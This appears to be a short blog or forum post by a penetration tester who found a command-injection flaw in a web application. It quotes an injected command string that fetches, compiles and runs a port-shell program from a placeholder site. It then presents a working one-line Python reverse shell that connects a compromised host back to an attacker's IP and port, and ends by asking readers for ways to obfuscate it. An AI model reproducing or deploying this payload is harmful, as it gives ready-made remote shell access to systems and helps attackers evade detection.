so the one cock says to the other...
Well, I was in the middle of a penetration test when I found a vulnerability in the system's argument handling: it allowed me to execute commands as the web server uid/gid.
I decided that instead of executing a ";wget protocol://site/dir/sub-dir/portshell.c;gcc -o p portshell.c;./p" I wanted to have the target connect to my development server, and using Python at that! As some of you may know, to accomplish a reverse shell you have to create a socket, dup2 the socket's fileno and execute a shell... in my case I needed to do it all on one line. This is probably not the best way to have done it, but here it goes:
sock = __import__('socket').socket(__import__('socket').AF_INET, __import__('socket').SOCK_STREAM); sock.connect((__import__('sys').argv[1], int(__import__('sys').argv[2]))); __import__('os').dup2(sock.fileno(), 0); __import__('os').dup2(sock.fileno(), 1); __import__('os').dup2(sock.fileno(), 2); __import__('os').execl('/bin/sh', '')
That is all *one* line. It's functional; to execute it you can use python -c with some modifications, or execute it from a shell with 2 arguments: the first is the IP, the second is the port.
Anyone have any ideas on how I can make this better? Or more sexy in obfuscation? ;)
